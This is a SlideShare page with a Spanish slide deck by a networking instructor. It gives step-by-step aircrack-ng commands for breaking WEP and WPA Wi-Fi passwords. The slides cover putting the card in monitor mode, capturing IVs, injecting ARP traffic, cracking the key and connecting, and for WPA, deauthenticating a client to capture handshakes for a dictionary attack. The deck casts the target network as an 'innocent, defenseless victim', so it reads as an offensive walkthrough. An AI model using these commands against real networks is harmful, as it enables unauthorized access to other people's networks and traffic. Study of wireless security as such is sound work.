Manual para romper contraseñas WEP y WPA

80,791 views

Published on

Algunos comandos paso a paso para obtener contraseñas WEP y WPA.

Published in: Technology
0 Comments
31 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
80,791
On SlideShare
0
From Embeds
0
Number of Embeds
29
Actions
Shares
0
Downloads
2,676
Comments
0
Likes
31
Embeds 0
No embeds

No notes for slide

Manual para romper contraseñas WEP y WPA

  1. 1. Paulo Colomés F. Docente Universidad Tecnológica de Chile Inacap Instructor CCNA CCAI Cisco Networking Academy www.redescisco.net
  2. 2. Objetivos
  3. 3. ¿Seguridad en redes inalámbricas?
  4. 4. ¿Seguridad en redes inalámbricas? WPA2-AES WPA2-TKIP WPA-PSK WEP 128 WEP 64 MAC Auth Sin Seguridad
  5. 5. ¿Seguridad en redes inalámbricas? WPA2-AES WPA2-TKIP WPA-PSK WEP 128 WEP 64 MAC Auth Sin Seguridad AQUÍ ATACAMO S!
  6. 6. Algo de lenguaje… -- WEP = Wired Equivalent Privacy -- WPA (No WAP) = WiFi Protected Access -- El verbo “encriptar” en español no existe, ni menos “desencriptar” ni ningún derivado. El término correcto es “cifrar”y “descifrar”
  7. 7. Nuestro Kit de Herramientas •Tarjeta inalámbrica decente •Sistema operativo Unix •Drivers parchados para inyectar tráfico en la red •Airodump-ng •Aireplay-ng •Wesside-ng (Opcional) •Aircrack-ng •Opcionales: •Kismet •Hydra •Airsniff •….otros
  8. 8. Sistema Operativo Unix • Backtrack 4 • Wifiway • Wifislax O algunos Linux previamente especializados en esta materia: •FreeBSD •OpenBSD •NetBSD •Solaris •Mac OSX •Linux
  9. 9. Ahora… a lo que vinimos
  10. 10. Pasos para obtener una contraseña WEP 1. Configurar la tarjeta de red en modo monitor (promisc) 2. Escanear el aire en búsqueda de una red inalámbrica interesante 3. Identificar una víctima inocente e indefensa 4. Comenzar a obtener tramas que contengan información WEP y almacenarlas en un archivo. 5. Si la víctima se resiste, inyectarle tráfico para generar respuestas vulnerables 6. Crackear la contraseña WEP 7. Conectarse y ser feliz 
  11. 11. ¿Por qué es posible romper claves WEP?
  12. 12. 1. WEP se basa en el algoritmo criptográfico RC4 el cual es conocido por sus vulnerabilidades. 2. WEP envía parte de su tráfico sin cifrar lo que permite capturar IVs (Vectores de Inicialización)
  13. 13. Pasos para obtener una contraseña WEP 1. Configurar la tarjeta de red en modo monitor (promisc) root@hacker:~# airmon-ng start wlan0 root@hacker:~# iwconfig
  14. 14. Pasos para obtener una contraseña WEP 2. Escanear el aire en búsqueda de una víctima en la interfaz monitor. root@hacker:~# airodump-ng mon0
  15. 15. Pasos para obtener una contraseña WEP 3. Una vez seleccionada la víctima capturamos los paquetes de tráfico que contengan IV’s válidos. root@hacker:~# airodump-ng –c 1 –w intento1 - -bssid 00:11:22:33:44:55 mon0 Donde: -c = Canal donde se encuentra la víctima (del 1 al 14) -w = Nombre con el que se guardará el archivo de capturas (.cap) - - bssid = Dirección MAC del Access Point que queremos crackear
  16. 16. Pasos para obtener una contraseña WEP 4. Esperar que se junten al menos 20.000 IV’s (Indicados en la columna #Data). Como esto puede tomarnos mucho tiempo, sobre todo si no hay tráfico entre algún cliente válido y el AP, debemos entonces acelerar ese proceso. En un nuevo terminal ejecutar: root@hacker:~# aireplay-ng -1 0 –a 00:11:22:33:44:55 -e Hackme mon0 Donde: -a = Dirección MAC del Access Point que queremos crackear. -e = Nombre de la red (SSID) que queremos creackear.
  17. 17. Pasos para obtener una contraseña WEP Se debe obtener un mensaje “Association Successful =) (AID: 1)”
  18. 18. Pasos para obtener una contraseña WEP 5. Inyectar tráfico ARP para acelerar la respuesta (ARP Replies) desde el Access Point que contenga IV Válidos para poder crackear. root@hacker:~# aireplay-ng -3 -b 00:11:22:33:44:55 mon0
  19. 19. Pasos para obtener una contraseña WEP Esperar que los IV’s del Airodump iniciado en el paso N° 3 lleguen a los 100.000, aunque con 20.000 es posible romper claves en ciertos casos.
  20. 20. Pasos para obtener una contraseña WEP 6. Cuando se tengan suficientes IV’s se puede lanzar el programa AirCrack sobre el archivo .cap almacenado anteriormente. root@hacker:~# aircrack intento1-01.cap
  21. 21. Pasos para obtener una contraseña WEP
  22. 22. Pasos para obtener una contraseña WEP 6. Una vez que se tenga la clave de la red Wireless, solo queda conectarse mediante un gestor gráfico o mediante comandos. iwconfig wlan0 mode managed iwconfig wlan0 key s:admin iwconfig wlan0 essid “Hackme” dhclient wlan0 ping www.google.cl
  23. 23. ¿Y las claves WPA/WPA2? Aunque WPA se basa en el mismo algoritmo que WEP (RC4), esta es más segura por ahora para redes inalámbricas y no es posible directamente crackear una contraseña WPA usando el mismo método que WEP. Lo que sí se puede hacer es lanzar un ataque de diccionario (no de fuerza bruta) contra esa red. Si la contraseña es básica, la podemos sacar. Esto solo funciona si es que hay algún cliente ya conectado a la red. Atacar WPA consiste en desconectar al cliente y capturar los handshakes de autenticación.
  24. 24. ¿Y las claves WPA/WPA2? 1. Capturar Handshakes # airodump-ng –c 1 –w intento1 - -bssid 00:11:22:33:44:55 mon0 2. Forzar a un cliente a reconectarse a la red # aireplay -0 5 -a 00:11:22:33:44:55 -c <MAC_CLIENTE> mon0 3. Una vez que se tengan los handshakes, correrle un ataque de diccionario. # aircrack –a 2 –b 00:11:22:33:44:55 –w /ruta/al/wordlist.txt Donde - -bssid, -a y –b es la MAC de del Access Point víctima

×